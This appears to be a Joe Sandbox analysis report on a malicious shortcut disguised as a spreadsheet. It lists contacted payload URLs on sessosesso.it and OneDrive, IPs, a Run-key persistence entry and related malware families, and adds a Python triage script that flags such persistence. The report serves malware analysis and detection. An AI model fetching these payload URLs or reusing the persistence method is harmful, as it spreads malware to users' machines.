http://ocsp.sectigo.com0 | uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta | mshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://crl.microsoft | powershell.exe, 00000011.00000002.1634145596.0000029E324B0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sessosesso.it/assets/aw/yt.htaU | mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sessosesso.it/assets/aw/yt.htaAC: | FT. 40FE CNY .xlsx.lnk | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://zyupsq.by.files.1drv.com/ | uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.sessosesso.it/assets/aw/yt.hta6288 | mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sessosesso.it/assets/aw/yt.htaPS_BROW | mshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sessosesso.it/assets/aw/yt.hta_ | mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://onedrive.live.com/_ | uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.sessosesso.it/assets/aw/uc.exep | powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.sessosesso.it/assets/aw/yt.hta1 | mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sessosesso.it/ | mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1724000.00000004.00000020.00020000.00000000.sdmp | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.sessosesso.it/assets/aw/yt.htaindows | mshta.exe, 00000009.00000002.1863133474.0000019AC170A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sessosesso.it/assets/aw/yt.hta5 | mshta.exe, 00000009.00000002.1863133474.0000019AC16F7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://live.com/ | uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://r3.o.lencr.org0 | bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.sessosesso.it/assets/aw/yt.htaH | mshta.exe, 00000009.00000002.1863790955.0000019AC1850000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe |
                                      unknown
                                      https://sessosesso.itpowershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://sectigo.com/CPS0uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.sessosesso.itpowershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmptrue
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://account.dyn.com/bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmptrue
                                          • URL Reputation: malware
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://go.micropowershell.exe, 0000000F.00000002.1678474741.000002B0011BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.sessosesso.it/assets/aw/yt.htaC:mshta.exe, 00000009.00000002.1863133474.0000019AC1680000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/Iconpowershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.ver)svchost.exe, 0000000E.00000002.2531370506.0000021C38E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://www.sessosesso.it/assets/aw/Book1.xlsxpowershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.sessosesso.it/assets/aw/yt.hta...-mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://mail.irmaklarpaslanmaz.com.trbwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://r3.i.lencr.org/0obwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.sessosesso.it/assets/aw/yt.hta...mshta.exe, 00000009.00000002.1864667684.000001A2C42A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000E.00000003.1320362193.0000021C38CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aka.ms/pscore68powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.sessosesso.it/assets/aw/yt.htaLMEMXmshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.apache.opowershell.exe, 0000000F.00000002.1839645117.000002B07C378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.pmail.comuc.exe, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000000.1494201950.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 00000019.00000000.1623023662.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 0000001B.00000000.1707510490.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif.19.drfalse
                                                        high
                                                        http://ocsp.sectigo.com0Cuc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://onedrive.live.com/downlouc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cuuc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
Legend for the contacted-IP map: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs

Contacted public IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.139.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
192.185.124.132 | mail.irmaklarpaslanmaz.com.tr | United States | 46606 | UNIFIEDLAYER-AS-1US | true
89.46.106.29 | sessosesso.it | Italy | 31034 | ARUBA-ASNIT | true

Contacted private/local IPs:
IP
127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430751
Start date and time: 2024-04-24 06:44:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FT. 40FE CNY .xlsx.lnk
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winLNK@26/26@5/4
EGA Information:
• Successful, ratio: 71.4%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 155
• Number of non-executed functions: 50
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.122.106, 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, fs.microsoft.com, odc-by-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, l-0003.l-msedge.net, e16604.g.akamaiedge.net, by-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-by-files-geo.onedrive.akadns.net, prod.fs.microsoft.com.akadns.net
• Execution Graph export aborted for target mshta.exe, PID 7260 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7688 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:45:14 | API Interceptor | 95x Sleep call for process: powershell.exe modified
06:45:18 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:45:19 | API Interceptor | 1x Sleep call for process: mshta.exe modified
06:45:30 | API Interceptor | 2x Sleep call for process: uc.exe modified
08:24:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ucvuiswb C:\Users\Public\Ucvuiswb.url
08:24:36 | API Interceptor | 40077x Sleep call for process: bwsiuvcU.pif modified
08:24:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ucvuiswb C:\Users\Public\Ucvuiswb.url
08:24:44 | API Interceptor | 2x Sleep call for process: Ucvuiswb.PIF modified
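The two Autostart rows record a Run-key value whose target is a .url Internet Shortcut under C:\Users\Public (a .url is opened by the shell, which follows its URL= line, so it can launch a local file the same way a .lnk does), and the API Interceptor rows record 40077 patched Sleep calls in bwsiuvcU.pif. The Python script below is an added example, not part of the Joe Sandbox report: it re-types the eight timeline rows above as constructed input and runs two triage checks over them, flagging Run-key targets that live in a user-writable directory or that are shortcuts/scripts rather than a plain executable, and flagging processes whose Sleep-call count exceeds a threshold. The directory list, the extension list and the 1000-call threshold are the example's own assumptions.

```python
"""Triage checks over Joe Sandbox-style timeline rows (added example, not report code)."""
import ntpath
import re
from dataclasses import dataclass, field

# Constructed input: the timeline rows of this report, re-typed as
# "time | type | description" so the example runs offline.
TIMELINE = r"""
06:45:14 | API Interceptor | 95x Sleep call for process: powershell.exe modified
06:45:18 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:45:19 | API Interceptor | 1x Sleep call for process: mshta.exe modified
06:45:30 | API Interceptor | 2x Sleep call for process: uc.exe modified
08:24:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ucvuiswb C:\Users\Public\Ucvuiswb.url
08:24:36 | API Interceptor | 40077x Sleep call for process: bwsiuvcU.pif modified
08:24:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ucvuiswb C:\Users\Public\Ucvuiswb.url
08:24:44 | API Interceptor | 2x Sleep call for process: Ucvuiswb.PIF modified
"""

# Assumption: directories a standard user can write to. An autostart target here
# runs at logon from a location the user (or malware running as the user) controls.
USER_WRITABLE_DIRS = (
    "c:\\users\\public\\",
    "\\appdata\\local\\temp\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
)
# Assumption: shortcut and script types that launch something else indirectly.
INDIRECT_EXTENSIONS = {".url", ".lnk", ".pif", ".scr", ".hta", ".js", ".jse",
                       ".vbs", ".vbe", ".cmd", ".bat", ".ps1"}

RUN_RE = re.compile(r"^Run: (?P<key>\S+) (?P<name>\S+) (?P<target>.+)$")
SLEEP_RE = re.compile(r"^(?P<count>\d+)x Sleep call for process: (?P<proc>\S+) modified$")


@dataclass
class Finding:
    time: str
    kind: str
    subject: str
    reasons: list = field(default_factory=list)


def parse_timeline(text):
    """Return (time, type, description) tuples; lines without three columns are skipped."""
    rows = []
    for line in text.strip().splitlines():
        parts = [p.strip() for p in line.split("|", 2)]
        if len(parts) == 3:
            rows.append(tuple(parts))
    return rows


def target_path(target):
    """Extract the program path from a Run value: quoted path, else first token."""
    target = target.strip()
    if target.startswith('"'):
        return target.split('"')[1]
    return target.split(" ")[0]


def check_run_keys(rows):
    """Flag Run-key entries whose target is user-writable or an indirect launcher."""
    findings = []
    for time, kind, desc in rows:
        if kind != "Autostart":
            continue
        m = RUN_RE.match(desc)
        if not m:
            continue
        path = target_path(m["target"])
        low = path.lower()
        reasons = []
        if any(d in low for d in USER_WRITABLE_DIRS):
            reasons.append("target in user-writable directory")
        ext = ntpath.splitext(low)[1]
        if ext in INDIRECT_EXTENSIONS:
            reasons.append(f"indirect launch via {ext} file")
        if reasons:
            findings.append(Finding(time, "run_key", f"{m['key']}\\{m['name']} -> {path}", reasons))
    return findings


def check_sleep_storms(rows, threshold=1000):
    """Flag processes whose patched Sleep-call count meets the threshold (delay-based evasion)."""
    findings = []
    for time, kind, desc in rows:
        m = SLEEP_RE.match(desc)
        if m and int(m["count"]) >= threshold:
            findings.append(Finding(time, "sleep_storm", m["proc"],
                                    [f"{m['count']} Sleep calls patched by the sandbox"]))
    return findings


def analyze(text, sleep_threshold=1000):
    rows = parse_timeline(text)
    return {"run_keys": check_run_keys(rows),
            "sleep_storms": check_sleep_storms(rows, sleep_threshold)}


if __name__ == "__main__":
    for bucket, items in analyze(TIMELINE).items():
        for f in items:
            print(f"{f.time} {bucket:12s} {f.subject}: {'; '.join(f.reasons)}")
```

On this report the script returns both Run-key rows (HKCU and the HKCU64 view of the same value) with both reasons, and bwsiuvcU.pif as the only process above the Sleep threshold; lowering the threshold to 50 also picks up the 95 calls in powershell.exe, which is why the threshold is a tuning knob rather than a fixed rule.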
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.139.11 | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22) | malicious | HtmlDropper, HTMLPhisher |
13.107.139.11 | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | Signed Proforma Invoice 3645479_pdf.vbs | malicious | FormBook |
13.107.139.11 | ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | 20240416-703661.cmd | malicious | DBatLoader |
13.107.139.11 | 20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | disktop.pif.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | Oeyrmdo.exe | malicious | AgentTesla, PureLog Stealer |
13.107.139.11 | z15ORDERBR2024-B001054840.vbs | malicious | Unknown |
89.46.106.29 | #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk | malicious | Unknown |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
sessosesso.it | #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk | malicious | Unknown | 89.46.106.29
www.sessosesso.it | #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk | malicious | Unknown | 89.46.106.29
dual-spov-0006.spov-msedge.net | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | payment swift.xls | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader | 13.107.139.11
dual-spov-0006.spov-msedge.net | pSfqOmM1DG.exe | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22) | malicious | HtmlDropper, HTMLPhisher | 13.107.139.11
